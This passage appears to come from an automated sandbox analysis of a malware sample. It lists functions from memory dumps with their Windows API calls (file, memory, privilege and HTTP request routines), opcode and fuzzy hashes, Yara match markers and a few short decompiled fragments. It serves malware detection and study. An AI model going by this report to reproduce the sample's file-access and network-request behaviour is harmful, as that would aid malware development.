Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF72,0040CF72,00000041,00000000,?,00408B35), ref: 00418620

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 86199f88c9bc95069a3839d85b69f3b768b26ac3f426fe44f4acef71e1d37d6b
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 75E01AB12002086BDB10EF49DC85EE737ADAF89650F018159FA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184D0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418D80(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x004184d3
0x004184ea
0x004184f8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 004184F8

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f0e6789d667daaae8a14a3bb2a3edfd4f0b4b377582a99054e252b8191c9f04
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 06D012716403187BD620EF99DC85FD7779CDF49750F058069FA1C5B241C531BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 004184C4, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(004134D6,?,O<A,00413C4F,?,004134D6,?,?,?,?,?,00000000,00408AC3,?), ref: 0041847D

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8b57812a0cbed7a5b2e781b905e30819b576ee6384743d049dec2b73b6e88208
Instruction ID: 3281fa91f542b964f6d3163c050f9f8371de8ef047ac085fb993fc17d5efaa51
Opcode Fuzzy Hash: 8b57812a0cbed7a5b2e781b905e30819b576ee6384743d049dec2b73b6e88208
Instruction Fuzzy Hash: 66C08CB500101029D32292A0FC40EF2BB1CCBC7BB5B21494AF2CC12010883698421A70

Uniqueness

Uniqueness Score: -1.00%

Function 02F3967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F39694

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 998e6e40fbb3b1c5cb7f45677fc93c873409a7bf40314cfb82a3cc927e148193
Instruction ID: 5deb1098dfd160d4d109fcbf74377e69243f46354c099c16e586b5ab37cc4c5b
Opcode Fuzzy Hash: 998e6e40fbb3b1c5cb7f45677fc93c873409a7bf40314cfb82a3cc927e148193
Instruction Fuzzy Hash: F6B09B71D064C5C5D611D76046087177D0477D0781F16C051D3020681A47F8C191F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02F8FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02F8FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02F3CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02F85720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02F85720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x02f8fdda
0x02f8fde2
0x02f8fde5
0x02f8fdec
0x02f8fdfa
0x02f8fdff
0x02f8fe0a
0x02f8fe0f
0x02f8fe17
0x02f8fe1e
0x02f8fe19
0x02f8fe19
0x02f8fe19
0x02f8fe20
0x02f8fe21
0x02f8fe22
0x02f8fe25
0x02f8fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F8FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F8FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F8FE2B

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 40e4223b9c47a7c316c7bed7e1ad4e9924f9db47170d02cc0340dbd41c79107f
Instruction ID: 0043a9a7e59ab5670ecfd3538116ad8d7befaf8370973c73205067d7dc5a21c1
Opcode Fuzzy Hash: 40e4223b9c47a7c316c7bed7e1ad4e9924f9db47170d02cc0340dbd41c79107f
Instruction Fuzzy Hash: 59F0F633640205BFEA202A55DC02F23BB5BEB44770F154315F729565D1DA62F86086F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wlanext.exe PID: 1844 Parent PID: 3388 wlanext.exeCOMMON

Executed Functions

Function 03258180, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03253B57,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03253B57,007A002E,00000000,00000060,00000000,00000000), ref: 032581CD

Strings

.z`, xrefs: 032581BD, 032581C8

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 299eb9421b26fcd320cb5045bc5b3f9f19120ec966c25477a3d3bfec4e949012
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 54F0BDB2211208ABCB08DF88DC84EEB77EDAF8C754F158248FA0D97240C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0325822A, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03253D12,5E972F59,FFFFFFFF,032539D1,?,?,03253D12,?,032539D1,FFFFFFFF,5E972F59,03253D12,?,00000000), ref: 03258275

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 3316ab9e8ccb45bfa3483e87ae7e1c6f1bd81862adc6de1ca14ed28f28cb3a2c
Instruction ID: acdc9e2a3b4d86aae90108dd40c4e78c19753efa73c5364239d23c5a2cfdb281
Opcode Fuzzy Hash: 3316ab9e8ccb45bfa3483e87ae7e1c6f1bd81862adc6de1ca14ed28f28cb3a2c
Instruction Fuzzy Hash: C3F0E7B6200108ABCB14DF88DC80EEB77A9BF8C754F158248FE1DA7251C630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03258230, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03253D12,5E972F59,FFFFFFFF,032539D1,?,?,03253D12,?,032539D1,FFFFFFFF,5E972F59,03253D12,?,00000000), ref: 03258275

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 0c17006345ef3ce9cdd563f6922ffa82508e6ab612f9ebc4f98d0e1f7d24d260
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: BFF0A4B6210208ABCB14DF99DC80EEB77ADAF8C754F158248BE1D97241D630E9518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03258360, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03242D11,00002000,00003000,00000004), ref: 03258399

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 1f8fcc4c0d24275b3b8b7f0bb853ad7a6f39bfc7eb51a91611466620dad2708a
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: FAF015B6210208ABCB14DF89CC80EAB77ADAF88650F158148FE0897241C630F910CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0325835E, Relevance: 1.5, APIs: 1, Instructions: 28memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03242D11,00002000,00003000,00000004), ref: 03258399

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 26761df0d1588cf6a48b63b26dd164a1a186d5894e5de42976aecbbd6a1e84f1
Instruction ID: 9a0e3cae92e35426740f0797d1ec3abd3f5ecf5a7661fbc99790c999d6ada512
Opcode Fuzzy Hash: 26761df0d1588cf6a48b63b26dd164a1a186d5894e5de42976aecbbd6a1e84f1
Instruction Fuzzy Hash: FEF030B5214189AFDB15DF98DC84CA777A8AF88210B15865DFD4997202C234D855CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 032582AA, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03253CF0,?,?,03253CF0,00000000,FFFFFFFF), ref: 032582D5

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 13f1b1edd2507801c03cc3e01895e43d258a13dfba3466186732e25f93b737d6
Instruction ID: 158901813a56af2ef78c8b2d693b4e24486855e111f0dfb216dd3e6990414e06
Opcode Fuzzy Hash: 13f1b1edd2507801c03cc3e01895e43d258a13dfba3466186732e25f93b737d6
Instruction Fuzzy Hash: 3BE0C2362102006BD710EFD4CC89FE77B68EF44620F144455FA089B241C170EA008BD0

Uniqueness

Uniqueness Score: -1.00%

Function 032582B0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03253CF0,?,?,03253CF0,00000000,FFFFFFFF), ref: 032582D5

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: ede328c5562863ff25ddc89791cf89446a61f2da7491461cfed5db9b93fb22b3
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: C8D01776201314ABD710EFA8CC85EA77BACEF48A60F154499BA189B242C570FA008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 03759A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03759A5A

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99be154bdebeb53c132a6f5a5db4b6b95a113a29ea70626cdab1199cc9fd7abe
Instruction ID: 0b9d1e64fcf88c76514d831c9e4d0f36f6af2cdf2fc1bdce64357a0f8b2fad6f
Opcode Fuzzy Hash: 99be154bdebeb53c132a6f5a5db4b6b95a113a29ea70626cdab1199cc9fd7abe
Instruction Fuzzy Hash: 9490026132184846E210A56A4C24B07004597D4343F51C125A4144554CCE5588617561

Uniqueness

Uniqueness Score: -1.00%

Function 03759910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0375991A

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c97e5732e16afe3516baa80c671c07248bc6f44cd63fbee0898ae065fe47610
Instruction ID: 3bc50bab33de2afc71780a0382e526a9149a6b08a944ac84c4339665963b8fa7
Opcode Fuzzy Hash: 8c97e5732e16afe3516baa80c671c07248bc6f44cd63fbee0898ae065fe47610
Instruction Fuzzy Hash: 4B9002B131104C06E150B15A4414746004597D4341F51C021A9054554E8B998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 037599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037599AA

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1f04a03941bcc4027e3d6f301289b19764ac2e0a963a6146edb644a53d12f69
Instruction ID: 7d8d6721549ee7d9523a88bd37865b980559be816b47d48204c5c3a07ee476bd
Opcode Fuzzy Hash: f1f04a03941bcc4027e3d6f301289b19764ac2e0a963a6146edb644a53d12f69
Instruction Fuzzy Hash: 379002A135104C46E110A15A4424B060045D7E5341F51C025E5054554D8B59CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 03759860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0375986A

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c08aaecba17132c094e2f20842a63b09d7ea1f05c4c8749052194fe0dd6bbcb
Instruction ID: 47d406771d58ac256c24d2b1157f4c93a15902b71a843278a402b9bd7bb22354
Opcode Fuzzy Hash: 2c08aaecba17132c094e2f20842a63b09d7ea1f05c4c8749052194fe0dd6bbcb
Instruction Fuzzy Hash: F590027131104C17E121A15A4514707004997D4281F91C422A4414558D9B968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 03759840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0375984A

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f2b0aca876cf5249c39bdfbec1ff6d66d47749ffc79f04c75dffbc936577bb0a
Instruction ID: 14f6b415d84739807130a0ff3e01726690c39cbba145d46a4f57b0b072d9a700
Opcode Fuzzy Hash: f2b0aca876cf5249c39bdfbec1ff6d66d47749ffc79f04c75dffbc936577bb0a
Instruction Fuzzy Hash: 42900261352089566555F15A44145074046A7E4281791C022A5404950C8A669856F661

Uniqueness

Uniqueness Score: -1.00%

Function 03759710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0375971A

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eaae9ff500598c555b1e6a58e42a1272d5d6e803cbb1c50ad37d90947e7273d8
Instruction ID: 2a24bdf7fea61444264777ac52e3d622e510c323fcd4c97a392cca305236e20b
Opcode Fuzzy Hash: eaae9ff500598c555b1e6a58e42a1272d5d6e803cbb1c50ad37d90947e7273d8
Instruction Fuzzy Hash: 8F90027131104C06E110A59A5418646004597E4341F51D021A9014555ECBA588917171

Uniqueness

Uniqueness Score: -1.00%

Function 03759FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03759FEA

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ea1b6c269e67b7424d0680b44a14a140bbc9b68f5f359e7443921542d17991d
Instruction ID: 951244609dfabead26ae9d8497ee311f699ca72dda08dcc8174f98905259da08
Opcode Fuzzy Hash: 3ea1b6c269e67b7424d0680b44a14a140bbc9b68f5f359e7443921542d17991d
Instruction Fuzzy Hash: E090027132118C06E120A15A8414706004597D5241F51C421A4814558D8BD588917162

Uniqueness

Uniqueness Score: -1.00%

Function 03759780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0375978A

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a442ee218c761ae66533ac9139ac7a83e63ca5122d6273fd876296fb84b7d491
Instruction ID: 7183cf44f6624221d3c581cbed6965726a11bf101b95a93deec0f4c4eb9123ef
Opcode Fuzzy Hash: a442ee218c761ae66533ac9139ac7a83e63ca5122d6273fd876296fb84b7d491
Instruction Fuzzy Hash: B490026932304806E190B15A541860A004597D5242F91D425A4005558CCE5588697361

Uniqueness

Uniqueness Score: -1.00%

Function 03759660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0375966A

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a0018efd5bf19b2ca14fe072a904c3c453c3e4a436b30355a81446d90f4e98c
Instruction ID: 507591acf32b7f9becaca15c5d63e90ecb4380d3997096a75078bf2d741ed9e2
Opcode Fuzzy Hash: 3a0018efd5bf19b2ca14fe072a904c3c453c3e4a436b30355a81446d90f4e98c
Instruction Fuzzy Hash: 4C90027131104C06E190B15A441464A004597D5341F91C025A4015654DCF558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 03759650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0375965A

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1aa1acc36c40a712c97021db8a53287d4eafcf89b4225b60f9c402403986e4e3
Instruction ID: 0c1e606460b0607bae671412410bd1c346768bd33e8681deddafa83f940fd83e
Opcode Fuzzy Hash: 1aa1acc36c40a712c97021db8a53287d4eafcf89b4225b60f9c402403986e4e3
Instruction Fuzzy Hash: 8990027131508C46E150B15A4414A46005597D4345F51C021A4054694D9B658D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 037596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037596EA

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1247c256e6f1e66dbf493bb51c304e5c5bde857c55e3ae273db40dbfdd3325c9
Instruction ID: 387ed555abc394f4f6e99374e53d5f25d6ee3631633b222065c9a91774276891
Opcode Fuzzy Hash: 1247c256e6f1e66dbf493bb51c304e5c5bde857c55e3ae273db40dbfdd3325c9
Instruction Fuzzy Hash: 939002713110CC06E120A15A841474A004597D4341F55C421A8414658D8BD588917161

Uniqueness

Uniqueness Score: -1.00%

Function 037596D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037596DA

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e33ccb30acac805908ec7dcb85203dff15ed0e28ec15c88ac776e4e7d2c98a24
Instruction ID: 36e66db7d64a402afae3b2bb8465b7eba8dcc7b55de7ba37e9ac75d3a406f7e7
Opcode Fuzzy Hash: e33ccb30acac805908ec7dcb85203dff15ed0e28ec15c88ac776e4e7d2c98a24
Instruction Fuzzy Hash: 2590027131104C46E110A15A4414B46004597E4341F51C026A4114654D8B55C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 03759540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0375954A

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00d54e0bc72675fa303e21b0dbd2c52cc1680f77c543e6e098f2751fd44760e1
Instruction ID: 299682ff307750e06faa59f1efb00e3d2aee2e065bb49e0b309dd58af0677512
Opcode Fuzzy Hash: 00d54e0bc72675fa303e21b0dbd2c52cc1680f77c543e6e098f2751fd44760e1
Instruction Fuzzy Hash: 59900265321048071115E55A0714507008697D9391351C031F5005550CDB6188617161

Uniqueness

Uniqueness Score: -1.00%

Function 037595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037595DA

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f9aae06621f04abd135d23f5ec3afcb373ac2ffca7f84f8fd578833bc572edc
Instruction ID: 423dfe95f272bb9da6fa10e9ebbe4a319e027b44b9cff8538055a64474f5b3f4
Opcode Fuzzy Hash: 3f9aae06621f04abd135d23f5ec3afcb373ac2ffca7f84f8fd578833bc572edc
Instruction Fuzzy Hash: 849002A1312048075115B15A4424616404A97E4241B51C031E5004590DCA6588917165

Uniqueness

Uniqueness Score: -1.00%

Function 03258890, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 032588F8

Strings

Requ, xrefs: 032588B8
HttpOpenRequestA, xrefs: 032588EA, 032588F5
estA, xrefs: 032588BF
Open, xrefs: 032588B1
OpenRequestA, xrefs: 032588EE, 032588F6
RequestA, xrefs: 032588F2, 032588F7
HttpOpenRequestA, xrefs: 0325889D, 032588A0
Http, xrefs: 032588AA

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
Instruction ID: b1aecaafd3005a2229632cf5d83896cda9c25cfd3908e5d22984b77d50029031
Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
Instruction Fuzzy Hash: 6501E9B2A15159AFCB04DF98D841DEF7BB9EB48210F158288FD08A7204D670EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 03258888, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 44networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 032588F8

Strings

Requ, xrefs: 032588B8
HttpOpenRequestA, xrefs: 032588EA, 032588F5
estA, xrefs: 032588BF
Open, xrefs: 032588B1
OpenRequestA, xrefs: 032588EE, 032588F6
RequestA, xrefs: 032588F2, 032588F7
HttpOpenRequestA, xrefs: 0325889D, 032588A0
Http, xrefs: 032588AA

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 7fb6c09f9db649b1b38e3a7ef2c0e86a52e502bf6fc9a99c11e219b06411b486
Instruction ID: 1cadeab5522886aa3f8a82e861bc025e2c9596c37ba8ba3bf9598510f8325481
Opcode Fuzzy Hash: 7fb6c09f9db649b1b38e3a7ef2c0e86a52e502bf6fc9a99c11e219b06411b486
Instruction Fuzzy Hash: 69010CB2A14159AFCB15DF98D881DEF7BB9EF48210F158298FD48A7204C770EE11CBA1

Uniqueness

Uniqueness Score: -1.00%

